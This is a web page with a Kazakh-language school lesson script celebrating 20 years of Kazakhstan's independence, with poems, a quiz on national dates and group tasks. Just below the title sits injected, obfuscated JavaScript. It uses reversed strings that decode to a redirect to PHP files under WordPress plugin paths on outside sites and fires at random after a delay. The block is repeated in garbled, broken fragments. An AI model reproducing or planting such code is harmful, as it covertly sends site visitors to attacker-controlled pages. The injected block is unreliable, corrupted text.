2024-07-27

Ашық сабақ. №23 мектеп-лицей Ерназарова Г.А. Тақырыбы: Егемен елдің еңсесі биік

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/images.jpeg» width=»200″ height=»132″ alt=»images» />

Сабақтың мақсаты: Биылғы жыл, Тәуелсіздіктің 20 жылдығы. Тәуелсіздік – қасиетті ұғым екеніне көз жеткізу Болашаққа сеніммен қадам басу, жас ұрпақты Отанына адал қызмет етуге тәрбиелеу. Өз ана тілін, әдет-ғұрпын, салт-дәстүрін сақтауды оқушылардың бойына дарыту. Білімді ұрпақ тәрбиелеу.

Сабақтың көрнекілігі: Тәуелсіздікке байланысты сөздер, нақыл сөздер, қазақ елі рәміздерінің суреттері Қазақстанның картасы т.б

Сабақтың барысы:

Мұғалім:
Алып өсен Абылайдай ұлылардың батасын,
Тәуелсіз ел, Егемен ел, Қазақ жасасын!
Бейбітшілік мызғымастай елімізде орнасын!
Қос қанаты қазағымның ешқашан да талмасын!

Бақыт қонып, ернеуімнен асып-тасып төгілдім,
Желбіреп тұр, әрін ашып, Көк байрағым елімнің.
Елтаңбам мен Әнұраным еріндікті білдірген
Ірге тасы мықты болсын қазақ деген елімнің!!!
деп ақын ағаларың жырлағандай бүгінгі «Егемен елдің еңсесі биік» атты тәрбие сағатымызды ашық деп жариялаймыз.
Менің Отаным – Қазақстан Республикасы әрі жас, әрі кәрі, байырғы атамекен.
Жас болатыны – бабалар армандаған тәуелсіздік туының желбірегеніне 20 жыл болды, кәрі болатыны – кешегі бабалардың бүгінгі біздің, ертеңгі ұрпақтың құт мекені

1 – жүргізуші:
Армысыздар, құрметті ұстаздар мен оқушылар!
Биыл – тәубе еткен Тәуелсіздікке 20 жыл. Тәуелсіздік-ең қымбат ұғым.
Тәуелсіздік жолында құрбан болған Алаш қайраткерлері мен ұлтын, тілін сүйген есіл азаматтардың әруағы бір аунап түсетін қасиетті күн. Бұл ұлық мейрам әр қазақтың жүрегіне патриоттық рухтың дәнін себуі тиіс.

Оқушылар: Ән ұран (хор)

2 – жүргізуші:
Қазақстан менің туған жерім, атамекенім.
Қазақ жері ұлан – байтақ. Осы кең-байтақ өлкеміздің жер көлемі 2 мың 700 шаршы км. Оған Греция , Швеция , Норвегия, Финляндия сияқты елдер сыйып кетеді.
Жер көлемі бойынша
Қазақстан, әлемде тоғызыншы орында.

1 – жүргізуші:

Енді біздің оқушылардың білімдерін викториналық сұрақтарға жауап беру арқылы сынап көрейік.

Жылдар сөйлейді…

1. Тәуелсіздігімізді алған жыл –
2. БҰҰ-ға мүше болған жыл –
3. Ата Заңымызды қабылдаған жыл –
4. Мемлекеттік тілімізді қабылдаған жыл –
5. Ұлттық теңге айналымға түскен жыл –
6. Астанаға көшірілген жыл —
7. Мемлекеттің рәміздерін бекіткен жыл –
8. Еліміздің тұңғыш президентін сайлаған жыл –
9. Қазақ ғарышкерін тұңғыш ұшырған жыл –
10. Қазақстанда Азиада олимпиадасы өткен жыл —

2 – жүргізуші
Қасиетті де құдіретті осы бір ұғымның тереңіне зер салып ой жіберейік. Тәуелсіздік атты бұл сөздің тұңғиығында ата бабамыздың ғасырлар бойғы асыл арманы, азаттық жолында құрбан болған талай-талай боздақтардың ұрпаққа қалдырған аманаты жатыр.

— Тәуелсіздік деген қасиетті сөзді қалай түсінеміз?

1 оқушы.
Тәуелсіздік – елімнің шамшырағы
Тәуелсіздік – халқымның бәйге пырағы
Тұрақты болсын, қуатты болсын әрқашан
Шырағы мен пырағының тұрағы.
Шамшырағы енді қайтып сөнбесін,
Жүйрік пырақ енді қайтып өлмесін.

2 оқушы

Мен – адаммын, әуелі содан кейін,
Қасқаюға қақым бар: — Қазақпын! – деп
Мен-тәуелсіз қазақпын, маған дейін,
Айта алмаған ата-анам азатпын деп
Мен-халықпын, жер бар, жалауы бар
Мақтан етер көп асыл қасиетім
Мен халықпын еркі бар, алауы бар
Қасиетті туы бар иетін!
Мен-азатпын өз еркім, өз үйім бар,
Азаттығым бекіген Ата заңмен
Мен адаммын көз қарасы сезімім бар
Қалыптасқан еңбекпен бата қанмен
Бәрі де бар бойымда осылардың
Бірақ, барға малданып алданбаймын,
Даму майдан, күреске қосылармын,
-Айналсам,- деп ұлы елге, армандаймын!

1 топ

Бүгін маған керек емес ертегі
Ертегіні өз ұлымда шертеді
Тарих керек ол ірге тасы халықтың
Ірге тассыз қаланбайды ертеңі
(Тарих беттеріне шолу жасау)

2 топ
Бейбітшілікпен жасампаздықтың 20 жылы
(Бүгінгі қол жеткізген жетістіктерге шолу)

3 топ
«Менің Қазақстаным – менің болашағым!»
(Шығармашылық жұмыс-эссе.)

Хор: «Менің Қазақстан»

Мұғалім: Міне, балалар, бүгінгі таңда Қазақстан өз алдына тәуелсіз мемлекет. Біздің өзіміздің Туымыз, Елтаңбамыз,Әнұранымыз бар, Егеменді Қазақстанбыз.
Сендерге Отанымыздың болашақ ұрпағысыңдар . Жақсы оқып ,тәртіпті болып , өз еліңді жеріңді көркейтіп,Қазақстанның намысын қорғайтын келешегі ,тірегі атаныңдар.

Яндекс.Метрика